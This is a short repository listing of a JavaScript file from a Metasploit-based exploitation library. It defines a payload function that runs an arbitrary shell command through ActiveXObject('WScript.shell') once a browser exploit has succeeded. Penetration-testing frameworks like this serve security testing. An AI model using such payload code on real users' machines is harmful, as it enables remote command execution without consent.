Files
metasploit-gs/data/js/memory/explib2/payload/exec.js
T
2016-10-08 21:55:16 -05:00

11 lines
173 B
JavaScript

function payload_exec(cmd) {
this.execute = function(explib) {
var WshShell = new ActiveXObject("WScript.shell");
var oExec = WshShell.Exec(cmd);
}
return this;
}